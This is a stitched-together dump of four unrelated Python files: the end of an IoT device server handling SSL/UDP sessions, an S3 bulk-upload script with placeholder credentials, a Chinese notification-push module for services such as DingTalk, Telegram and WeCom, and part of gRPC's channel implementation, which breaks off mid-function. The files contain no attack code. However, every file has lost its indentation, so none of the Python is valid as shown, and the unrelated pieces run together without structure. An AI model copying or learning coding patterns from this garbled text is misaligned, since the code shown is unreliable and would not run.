self.sessions[deviceId] = session
self.logger.debug("Creating thread for handling SSL communication with {0}".format(binascii.hexlify(deviceId)))
conectionThread = threading.Thread(target = self.hadleSslCommunication, args = (deviceId, sslSocket))
conectionThread.daemon = True
conectionThread.start()
else:
sslSocket.shutdown(socket.SHUT_RDWR)
sslSocket.close()
self.logger.warning('received invalid signature in certificate description field for device {0}. expected={1}, received={2} - closing connection'.format(cn, binascii.hexlify(expectedSignature), desc))
except Exception as e:
self.logger.exception(e)
try:
newsocket.shutdown(socket.SHUT_RDWR)
newsocket.close()
except:
pass
except Exception as e:
self.logger.exception(e)
time.sleep(10)
def hadleSslCommunication(self, deviceId, sslSocket):
try:
while True:
payload = iotcommon.recvMessage(sslSocket)
clientAddr = sslSocket.getpeername()
self.logger.info("Received SSL payload from {0} at {1}:{2}: {3}".format(binascii.hexlify(deviceId), clientAddr[0], clientAddr[1], payload))
if deviceId in self.sessions:
session = self.sessions[deviceId]
else:
self.logger.debug(" creating new session for SSL device: %s", binascii.hexlify(deviceId))
session = IotSession(deviceId, IotSession.TYPE_SSL)
self.sessions[deviceId] = session
session.lastUpdateTime = datetime.datetime.now()
session.lastPayload = payload
session.clientAddr = clientAddr
session.sslSocket = sslSocket
if self.logger.getEffectiveLevel() == logging.DEBUG:
self.dumpSessions()
self.passToHandler(deviceId, payload)
except Exception as e:
self.logger.error("Something went wrong, closing connection")
self.logger.exception(e)
try:
#self.removeSession(deviceId)
self.logger.info("closing connection to deviceId {0}, IP {1}".format(binascii.hexlify(deviceId), sslSocket.getpeername()[0]))
sslSocket.shutdown(socket.SHUT_RDWR)
self.logger.info("connection to deviceId {0}, IP {1} closed".format(binascii.hexlify(deviceId), sslSocket.getpeername()[0]))
sslSocket.close()
except:
pass
def repeat(self):
try:
self.task()
except Exception as e:
self.logger.exception(e)
except:
self.logger.error("error on executing task: {0} ".format(sys.exc_info()[0]))
timer = threading.Timer(self.taskIntervalSecond, self.repeat)
timer.daemon = True
timer.start()
def task(self):
self.saveState()
self.removeInactiveSessions()
def handleUdpMessage(self, message, clientAddr):
self.logger.debug(" handling decoded UDP message from device")
isNewSession = False
if message.deviceId in self.sessions:
session = self.sessions[message.deviceId]
else:
self.logger.debug(" attemping to create new session for UDP device: %s", binascii.hexlify(message.deviceId))
session = IotSession(message.deviceId, IotSession.TYPE_UDP)
isNewSession = True
counter = self.getCounter(message.deviceId)
self.logger.debug(" Validating counters: local={0}, incoming={1}".format(counter.udpReceivedCounter, message.counter1))
if (message.counter1 > counter.udpReceivedCounter):
self.logger.debug(" Counter OK. updating session for device %s", binascii.hexlify(message.deviceId))
session.lastUdpMessage = message
session.lastPayload = message.payload
session.clientAddr = clientAddr
session.lastUpdateTime = datetime.datetime.now()
counter.udpReceivedCounter = message.counter1
if isNewSession:
self.sessions[message.deviceId] = session
self.logger.info("Received valid UDP message from {0}:{1}, deviceId={2}, payload={3}. Calling server handler.".format(clientAddr[0], clientAddr[1], binascii.hexlify(message.deviceId), message.payload))
self.passToHandler(message.deviceId, message.payload)
else:
self.logger.warning("Invalid counter in message from device {0}, local={1}, incoming={2} - discarding".format(binascii.hexlify(message.deviceId), counter.udpReceivedCounter, message.counter1))
def sendMessage(self, deviceId, payload):
self.logger.debug("Attempting do send message to device %s, payload %s", binascii.hexlify(deviceId), payload)
if deviceId in self.sessions:
session = self.sessions[deviceId]
if session.protocol == IotSession.TYPE_UDP:
counter = self.getCounter(deviceId)
message = UdpPacket(deviceId, UdpPacket.SERVER_TO_CLIENT, self.IOT_PROTOCOL_VERSION, counter.udpSentCounter, session.lastUdpMessage.counter1, payload)
deviceKey = iotcommon.deriveKey(self.masterKey, deviceId)
data = message.createPacket(deviceKey)
self.logger.info("Sending {0} bytes in UDP to device {1} at {2}:{3}".format(len(data), binascii.hexlify(message.deviceId), session.clientAddr[0], session.clientAddr[1]))
with session.lock:
self.udpServer.socket.sendto(data, session.clientAddr)
counter.udpSentCounter += 1
self.saveState()
elif session.protocol == IotSession.TYPE_SSL:
self.logger.info("Sending {0} bytes by SSL to device {1} at {2}:{3}".format(len(payload), binascii.hexlify(deviceId), session.clientAddr[0], session.clientAddr[1]))
with session.lock:
iotcommon.sendMessage(session.sslSocket, payload)
else:
self.logger.warning("could not send message to device - device %s is not connected", binascii.hexlify(message.deviceId))
return False
def passToHandler(self, deviceId, payload):
try:
self.serverHandler.handleDeviceCall(deviceId, payload)
payloadDict = json.loads(payload)
ackDict = {"ack":""}
if "mid" in payloadDict:
ackDict["ack"] = payloadDict["mid"]
ackPayload = json.dumps(ackDict)
self.logger.info("Responding to {0} with {1}".format(binascii.hexlify(deviceId), ackPayload))
self.sendMessage(deviceId, ackPayload)
except Exception as e:
self.logger.exception(e)
def removeInactiveSessions(self):
for deviceId, session in self.sessions.items():
secs = (datetime.datetime.now() - session.lastUpdateTime).total_seconds()
if session.protocol == "udp" and secs > self.udpTimeout:
self.logger.info("UDP session for device {0} at {1}:{2} is inactive for {3} - removing".format(binascii.hexlify(deviceId), session.clientAddr[0], session.clientAddr[1], secs))
self.removeSession(deviceId)
def loadState(self):
self.counters = dict()
if not os.path.exists(self.stateFile):
self.logger.warning("State file at {0} doesn't exist. Creating initial empty counters file.".format(self.stateFile))
f = open(self.stateFile, 'w')
f.close()
else:
with open(self.stateFile, 'r') as f:
lines = f.readlines()
for line in lines:
split = line.split(' ')
deviceId = str(bytearray.fromhex(split[0]))
sentCounter = int(split[1])
receivedCounter = int(split[2])
self.counters[deviceId] = UdpCounter(deviceId, sentCounter, receivedCounter)
self.logger.info("{0} record(s) loaded from state file at {1}".format(len(self.counters), self.stateFile))
def saveState(self):
tmpFile = self.stateFile + '.tmp'
with open(tmpFile, 'w') as f:
for deviceId, counter in self.counters.items():
f.write(binascii.hexlify(deviceId) + ' ' + str(counter.udpSentCounter) + ' ' + str(counter .udpReceivedCounter) + '\n')
os.rename(tmpFile, self.stateFile)
self.logger.info("{0} counter(s) saved to file {1}".format(len(self.counters), self.stateFile))
def getCounter(self, deviceId):
if not deviceId in self.counters:
self.counters[deviceId] = UdpCounter(deviceId, 1, 0)
return self.counters[deviceId]
def removeSession(self, deviceId):
try:
sessions = dict(self.sessions)
del sessions[deviceId]
self.sessions = sessions
except:
pass
def dumpSessions(self):
self.logger.debug("currently %d device(s) connected:", len(self.sessions))
for deviceId, session in self.sessions.items():
self.logger.debug(" %s:device %s last updated from %s:%s at %s", session.protocol, binascii.hexlify(deviceId), session.clientAddr[0], session.clientAddr[1], session.lastUpdateTime.strftime('%Y-%m-%d %H:%M:%S'))
|
aws_upload.py
|
import boto3
session = boto3.Session(
aws_access_key_id='<Your access key>',
aws_secret_access_key='<Your secret Key>')
s3 = session.resource('s3')
import threading
from os import listdir
from typing import List
#TODO: Constans to be filled by developer
AWS_BUCKET_NAME = ""
AWS_DESTINATION_FOLDER_NAME = ""
LOCAL_SOURCE_FOLDER_NAME = ""
NUMBER_THREADS = 4 #Change this to your convinience
FILES_FOR_SINGLE_THREAD = 1000 # Change this
bucket = s3.Bucket(AWS_BUCKET_NAME)
s3_list = [str(data.key).split("/")[1].strip() if str(data.key).split("/")[0].strip() == AWS_DESTINATION_FOLDER_NAME else "" for data in bucket.objects.all()]
print(f"Got s3 list with length of {len(s3_list)}")
def start_uploading(file_names: List):
for i in file_names:
if i in s3_list:
try:
temp = open(f"{LOCAL_SOURCE_FOLDER_NAME}/{i}", "rb")
object_ = s3.Object(AWS_BUCKET_NAME, f"{AWS_DESTINATION_FOLDER_NAME}/{i}")
object_.put(Body = temp)
temp.close()
except Exception as e:
print(e, i)
else:
print(f"{i} not in the storage")
print("Finished Uploading files")
threads = []
for i in range(0, NUMBER_THREADS):
try:
files_list = listdir(LOCAL_SOURCE_FOLDER_NAME)[i*FILES_FOR_SINGLE_THREAD:(i*FILES_FOR_SINGLE_THREAD + FILES_FOR_SINGLE_THREAD + 1)]
except Exception as e:
files_list = listdir(LOCAL_SOURCE_FOLDER_NAME)[i*FILES_FOR_SINGLE_THREAD:]
print("Index Error")
threads.append(threading.Thread(target = start_uploading, args = (files_list,)))
for i in threads: i.start()
|
notify_mtr_older.py
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import os
import re
import threading
import time
import urllib.parse
import requests
try:
import json5 as json
except ModuleNotFoundError:
import json
try:
from utils_env import get_file_path
except ModuleNotFoundError:
def get_file_path():
return ""
# 原先的 print 函数和主线程的锁
_print = print
mutex = threading.Lock()
# 定义新的 print 函数
def print(text, *args, **kw):
"""
使输出有序进行,不出现多线程同一时间输出导致错乱的问题。
"""
with mutex:
_print(text, *args, **kw)
# 通知服务
# fmt: off
push_config = {
'HITOKOTO': False, # 启用一言(随机句子)
'BARK_PUSH': '', # bark IP 或设备码,例:https://api.day.app/DxHcxxxxxRxxxxxxcm/
'BARK_ARCHIVE': '', # bark 推送是否存档
'BARK_GROUP': '', # bark 推送分组
'BARK_SOUND': '', # bark 推送声音
'CONSOLE': True, # 控制台输出
'DD_BOT_SECRET': '', # 钉钉机器人的 DD_BOT_SECRET
'DD_BOT_TOKEN': '', # 钉钉机器人的 DD_BOT_TOKEN
'FSKEY': '', # 飞书机器人的 FSKEY
'GOBOT_URL': '', # go-cqhttp
# 推送到个人QQ:http://127.0.0.1/send_private_msg
# 群:http://127.0.0.1/send_group_msg
'GOBOT_QQ': '', # go-cqhttp 的推送群或用户
# GOBOT_URL 设置 /send_private_msg 时填入 user_id=个人QQ
# /send_group_msg 时填入 group_id=QQ群
'GOBOT_TOKEN': '', # go-cqhttp 的 access_token
'IGOT_PUSH_KEY': '', # iGot 聚合推送的 IGOT_PUSH_KEY
'PUSH_KEY': '', # server 酱的 PUSH_KEY,兼容旧版与 Turbo 版
'PUSH_PLUS_TOKEN': '', # push+ 微信推送的用户令牌
'PUSH_PLUS_USER': '', # push+ 微信推送的群组编码
'QMSG_KEY': '', # qmsg 酱的 QMSG_KEY
'QMSG_TYPE': '', # qmsg 酱的 QMSG_TYPE
'QYWX_AM': '', # 企业微信应用
'QYWX_KEY': '', # 企业微信机器人
'TG_BOT_TOKEN': '', # tg 机器人的 TG_BOT_TOKEN,例:1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
'TG_USER_ID': '', # tg 机器人的 TG_USER_ID,例:1434078534
'TG_API_HOST': '', # tg 代理 api
'TG_PROXY_AUTH': '', # tg 代理认证参数
'TG_PROXY_HOST': '', # tg 机器人的 TG_PROXY_HOST
'TG_PROXY_PORT': '', # tg 机器人的 TG_PROXY_PORT
}
notify_function = []
# fmt: on
# 首先读取 面板变量 或者 github action 运行变量
for k in push_config:
if os.getenv(k):
v = os.getenv(k)
push_config[k] = v
# 读取配置文件中的变量 (会覆盖环境变量)
CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.json5")
if os.path.exists(CONFIG_PATH):
print(f"通知配置文件存在:{CONFIG_PATH}。")
try:
for k, v in dict(
json.load(open(CONFIG_PATH, mode="r", encoding="utf-8"))
).items():
if k in push_config:
push_config[k] = v
except ValueError:
print(
f"错误:配置文件 {CONFIG_PATH} 格式不对,请在 https://verytoolz.com/json5-validator.html 中检查格式"
)
elif CONFIG_PATH:
print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!")
def bark(title: str, content: str) -> None:
"""
使用 bark 推送消息。
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
"""
使用 控制台 推送消息。
"""
print(f"{title}\n\n" f"{content}")
def dingding_bot(title: str, content: str) -> None:
"""
使用 钉钉机器人 推送消息。
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
def feishu_bot(title: str, content: str) -> None:
"""
使用 飞书机器人 推送消息。
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data, quote_keys=True)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
"""
使用 go_cqhttp 推送消息。
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def iGot(title: str, content: str) -> None:
"""
使用 iGot 推送消息。
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
"""
通过 serverJ 推送消息。
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
"""
通过 push+ 推送消息。
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data, quote_keys=True).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
"""
使用 qmsg 推送消息。
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
"""
通过 企业微信 APP 推送消息。
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
if 4 < len(QYWX_AM_AY) > 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
# 如果没有配置 media_id 默认就以 text 方式发送
if not media_id:
message = title + "\n\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def wecom_bot(title: str, content: str) -> None:
"""
通过 企业微信机器人 推送消息。
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
"""
使用 telegram 机器人 推送消息。
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
"""
获取一条一言。
:return:
"""
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
def excepthook(args, /):
if issubclass(args.exc_type, requests.exceptions.RequestException):
print(
f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}"
)
else:
global default_hook
default_hook(args)
default_hook = threading.excepthook
threading.excepthook = excepthook
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
